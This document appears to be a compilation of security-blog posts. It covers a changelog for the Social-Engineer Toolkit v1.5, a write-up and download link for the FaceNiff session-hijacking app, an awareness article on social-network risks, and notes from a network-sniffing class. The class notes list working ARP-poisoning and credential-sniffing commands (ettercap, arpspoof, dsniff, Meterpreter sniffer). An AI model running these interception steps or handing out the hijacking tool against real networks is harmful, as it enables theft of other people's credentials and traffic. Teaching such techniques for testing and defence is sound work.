Download Social-Engineer Toolkit v1.5

The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Official change log:

• Added shell.py to support both Linux and OSX for the SET Interactive Shell, uses same code repository
• Added shell to support Linux/OSX for SET Interactive Shell
• Added download to support Linux/OSX for SET Interactive Shell
• Added upload to support Linux/OSX for SET Interactive Shell
• Added ps to support Linux/OSX for SET Interactive Shell
• Added kill to support Linux/OSX for SET Interative Shell
• Fixed a bug in mass mailer where TLS would execute after ehlo not before. Thanks pr1me
• Changed download path to replace forward and back slashes with a _ so it would not cause strange nix issues with back slashes and forward slashes in the SET Interactive Shell
• Added better integer handling when running listener.py by itself without specifying a port
• Redesignated filename shell.binary to shell.windows and shell.linux (PE vs. ELF binary)
• Added separate installers for shell.linux and shell.osx, to many differences between the two and needed different compiling.
• Added instructions in shell.py how to compile for each flavor operating system including windows, linux, and osx
• Added reboot now into the SET interactive Shell
• Added persistence to the SET interactive shell with a completely custom written python-bytecompiled service. Essentially uploads service to victim, that calls interactive shell every 30 minutes
• Added name distinguishing per windows/posix systems so it will show up POSIX or WINDOWS on interactive shell, will also show WINDOWSUAC-SAFE and WINDOWSSYSTEM.
• Added the MS11-050 IE mshtml!CObjectElement Use After Free exploit from Metasploit
• Added dynamic packing to download/upload for persistence, better AV avoidance
• Added MS11-050, Adobe Flash 10.2.153.1, and Cisco AnyConnect Metasploit exploits to the SET web gui
• Added ‘clear’ and ‘cls’ in the SET Interactive Menu to remove whats in the screen, etc.
• When using the java docbase exploit, removed ‘Client Login’ for title frame, isn’t needed
• Added back command to the SET interactive shell to go back when in different menus
• Fixed a bug where it would state payloadprep not defined, it was caused to UPX not fully packing the device at time of upload, a 3 second delay has been added

Download Social Engineering Toolkit v1.5

 Social-Engineer Toolkit v1.5 download  social-engineering attacks

Faceniff evil android application

                                                   What is Faceniff?

FaceNiff is an Android application that lets users sniff and intercept web session profiles over Wi-Fi networks, stealing other users’ credentials from Facebook, Twitter and other services.
The app requires root access on the user’s Android smartphone, but other than that it’s fairly simple to use, which makes it perhaps even more dangerous than Firesheep, a Firefox extension that lets users hijack Facebook and Twitter sessions over Wi-Fi networks. FaceNiff also works on WPA-encrypted Wi-Fi networks, which Firesheep doesn’t support.

Right now it works with Facebook, Twitter, YouTube, and Nasza-Klasa (a Polish Facebook clone), but developer Bartosz Ponurkiewicz promises more are coming.

FaceNiff is much more flexible than Firesheep as the latter requires a computer. Nearly anything is accessible to FaceNiff users, providing they can get access to protected networks.

Here is the video of faceniff demonstrating the new attack



How to protect yourself from FaceNiff?

FaceNiff cannot, however, access accounts that use https browsing, which encrypts information for a more secure browsing session. Facebook is not automatically on https. Users must enable it manually, and Twitter also requires users to manually activate it. Perhaps with the wider availability of an app like FaceNiff, https browsing will become standard.


you can download FaceNiff from its official website http://faceniff.ponury.net/

Social Networking and Security Risks

The popularity of Social Networking websites have been increased drastically.Every one from child to old are on a Social Networking website.Facebook,Twitter are some of them who are popular now a days.They can be used for professional networking  job searches , Internet Marketing etc...These Social Networking sites can be a very good source for entertainment and learning purpose but it also have it's own security risks about which many are not aware till now.These security risks can be very dangerous for general peoples and children's.

Previously i had gone deep into the Facebook scams spread over the world wide web on which i posted a article at my blog.Now I will aware you guys about the Social Networking Security Risks through my article exclusive on hackersbay.in

WHAT ARE SOCIAL NETWORKING WEBSITES ?

Social networking websites function like an online community of internet users. Depending on the website in question, many of these online community members share common interests in hobbies, religion, or politics. Once you are granted access to a social networking website you can begin to socialize. This socialization may include reading the profile pages of other members and possibly even contacting them. 

There are a variety of people in these websites whom we don't know..Online meeting is not enough to understand and study a people if he a right guy to do friendship with..There is always a risk of Blackmailing,Malware Spreading,Identity Theft etc..


Generally peoples who are aware of the risks and dangers  of Social Networking can take his way out of these crimes done via Social Networking and the Peoples not aware about this will surely be a prey...


There is a maximum of Social Engineering used by the Hackers in these crimes


=============================================================================
DANGERS/RISKS OF SOCIAL NETWORKING.

Facebook

Events and Questions

You must be knowing about the famous scam that was on Facebook some days before "View Who Viewed your Profile" . I remember i got more than 20 invites for that event..These events can be used by the hackers as a source through which they can use their social engineering skills on you.You cannot even know they are hackers and using their skills on you ... The new Facebook feature "Questions" will even help them

Now lets take a Example

You are invited to a Event called "About me" or A friend asked you through the Question feature..

They will include some questions because the topic itself tell About Me

1. What was my most embarrassing moment?
2. Which City you were born ?
3. What was the name of my first elementary school?
4. What was my favorite pet’s name?
5- What is your father's name


These question are not harmful to answer in a general conversation with your friends or relatives.But if you look at the questions carefully they are security questions asked in the SOCIAL NETWORKING SITES. Using this sensitive information to the secret questions they can access your account and you will be ruined.

You can read this story and think how you can suffer  

 Facebook Applications

Applications Facebook offers thousands of applications that its users can install and run. These applications include calendars that allow Friends to be reminded when it’s your birthday, tools to send Friends online greeting cards, quizzes on myriad topics and much more.





These Applications look totally harmless but in some cases it is not they are used by hackers to deliver malicious contents to your computer This holds true not only to Facebook, but also to other social networking sites and to the Internet in general, when downloading from the Web or opening attachments in email messages. Therefore, make certain that your computer has a proper and functional firewall, as well as up-to-date antivirus/anti-malware software, and only install or run these applications if they are from a trusted source or approved by your corporate IT department. We call them JAVA APPLETS or JAVA DRIVE-BY

TWITTER 

Twitter is an online application that allows you to post brief comments (tweets) on any topic. Other users on the Twitter network can become a follower of your tweets, such that they receive the updates whenever you send them.  Twitter Twitter is used for professional purpose so the risks here differs from Facebook.Generally Twitter is used by the celebrities,Companies they tweet their updates every time.Some body told me some one tweeted his twitter when the Osama kill mission started.

The employes may even tweet something that may be harmful for their company.The companies should keep a eye on the employes tweets or the tweets may be harmful for their future.


FRAUDS and HOAXES
weather it is Facebook or Twitter the online banking or day-to-day purchases, be aware of emails that claim to be from these sites but are actually hoaxes and may contain malicious content. If have received numerous emails that seems to be from  bank, yet are actually sent by a spammer in the hopes of obtaining the online username and password.

The messages may even contain an attached ZIP file that recipients are asked to open to see who invited them. The attachment will contain some Trojans and Malwares which can cause damage to your computer giving your sensitive information to the hacker

URL SHORTENING

Another form of hoax involves the shortening, of URLs in email messages or on websites  such as our favorites: Facebook,  Twitter.Often times, the links that we want to post can get very long, making them unwieldy or impossible to type in the small space allotted by the network sites. To get around this, third-party services such as http://tinyurl.com/ or http://bit.ly/ will “encode” the URL into a much shorter version.example - http://www.facebook.com/sauravhacker will turn into http://adf.ly/1PnMZ

Although the benefit of URL shortening is obvious, there is also a security risk associated with it, in that the shortened URL really does not tell you the true destination of the link. You only find out once you get there, which may be too late if that site happens to contains drive-by malware or content which should not be viewed by “sensitive” eyes. Therefore, make certain that you click on shortened URLs only if you trust the sender. Never click on them if they are contained in spam messages or on sites that you have any reason to consider suspicious.

You can use any longurl service also to long the shortened url.

PROTECTION

Use Different Passwords, Change Them Often: Each of your social networking sites as well as all other important websites should have different, complex password assigned to them, and they should be changed regularly. Since people often use the same password on multiple sites, one compromised account could easily lead to compromising other accounts.

Don’t Blindly Give Out Your Credentials: There are a lot of third party web-based services out there that make use of your social networking services. In the past, the only way for this to occur was to give your credentials to these services. This works, so long as these third party services weren’t somehow compromised, or worse, the services were not what they seemed to be.


Keep Your Operating System, Browser Patched: Ensure you have applied all the latest patches from Microsoft, Apple, or whomever supplies your computer’s underlying operating system. Ensure you are using the latest version of your web browser.  If you are using Internet Explorer–especially if you are using Internet Explorer version 6, as is standard on Windows XP, try using a third party browser such as Firefox or Google Chrome.

Browser Plugins Can Help: If you are using Firefox, there are plugins that can help expand those “short” URLs so you can see where it is they will take you. like LongURL

Antivirus: Always use a updated version of antivirus / Anti malware / anti rootkit . The updated version will be having it;s virus database updated which will help you recognizing and deleting those.


Click on links you trust from - Always click on links if you got from a trusted guy because the other links may contain trojans in them or even phishers.


 If you are aware about the Social Networking Risks you are secured from the hacker.It is not that i only mentioned about Facebook and Twitter means the risks are only on them. These risks exists in all the social networking sites but the hackers target the most popular which now a days is Facebook and Twitter

I missed something ?? Please tell me through your precious comments 


 References and Credits
-Phone Boy 
-Brad Dinerman
-Saurav

Network Sniffers Class for the Kentuckiana ISSA 2011

This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects:  TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep and Xplico. I lost part of Gary's on screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.


Part 1: Intro to Sniffers


Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

Part 2: Wireshark and Wireless with Gary Hampton

Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.


Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep, Xplico and bridging.


Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Commands used:

Wireshark Demo   1.       Run Wireshark 2.       Basic start capture 3.       Start capture with options 4.       Drill down OSI 5.       Capture filter options (4.9 in book) not tcp port 3389 not broadcast and not multicast 6.       Show a packet 7.       Pop a packet out 8.       Sort by columns 9.       Follow stream (web traffic) 10.    Export HTTP Objects 11.    Simple view filters tcp.port == 80 !(ip.addr == 192.168.1.13) 12.    Filter builder 13.    Apply filters from different panes (packet vs. details panes). 14.    Save filters 15.     Open a Wiki page 16.    Edit-> Find packet 17.    Analyzers ->Expert Info 18.    Analyzers ->Firewall ACLs 19.    Stats 20.    Color rules 21.    Save capture 22.    Mention Lua Dumpcap/TCPDump     dumpcap –D     dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap Sniffing in Monitor mode    ifconfig wlan0 down    iwconfig wlan0 mode monitor    iwconfig wlan0 channel 1    ifconfig wlan0 up Ettercap Demo 1.      ettercap -T –q –i eth0 -M ARP // // 2.      ettercap -T –q –i eth0 -M ARP // /10.1.1.1/ 3.      Show ARP traffic 4.      Telnet to 10.1.1.1 5.      http to 10.1.1.1 6.      FTP/Telnet/HTTP someplace with a password 7.      Show find sniffers ettercap –G ettercap –T –I eth0 –P list ettercap –T –I eth0 –P search_promisc  // 8.      Filters:      etterfilter ig.filter -o ig.ef      ettercap -T -q -F ig.ef -M ARP // // 9.      Mention MITM: icmp, dhcp, port filters 10.    driftnet -i eth0 11.    Etherape

Cain Demo 1.      Start poisoning 2.      Telnet to 10.1.1.1 3.      http to 10.1.1.1 4.      FTP/Telnet/HTTP someplace with a password 5.      SSL someplace from VM 6.      Sniff RDP ARPSpoof Demo    cat /proc/sys/net/ipv4/ip_forward    echo 1 > /proc/sys/net/ipv4/ip_forward    arpspoof -i eth0 10.0.0.1    arpspoof -i eth0 -t 10.0.0.113 10.0.0.1    dsniff –I eth0 -c NetworkMiner 1.      TCP fingerprinting 2.      Host details 3.      DHCP finger printing 4.      File capture 5.      Passwords 6.      Plaintext 7.      Open pcap Bridging in Linux setup     sudo apt-get install bridge-utils    Script to setup MAC bridging:     ifconfig eth0 0.0.0.0     ifconfig eth1 0.0.0.0     brctl addbr mybridge     brctl addif mybridge eth0     brctl addif mybridge eth1     ifconfig mybridge up Things to show while bridged     ifconfig     sudo tcpdump -i mybridge -s 0 -w out.cap     sudo etherape -i mybridge     sudo driftnet -i mybridge Metasploit/SET    Backtrack->Penetration->SET    Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no    <go to page>    sessions -i 1    use sniffer    help    sniffer_interfaces    sniffer_start 2    sniffer_dump 2 /tmp/all.cap    <Show in Wireshark>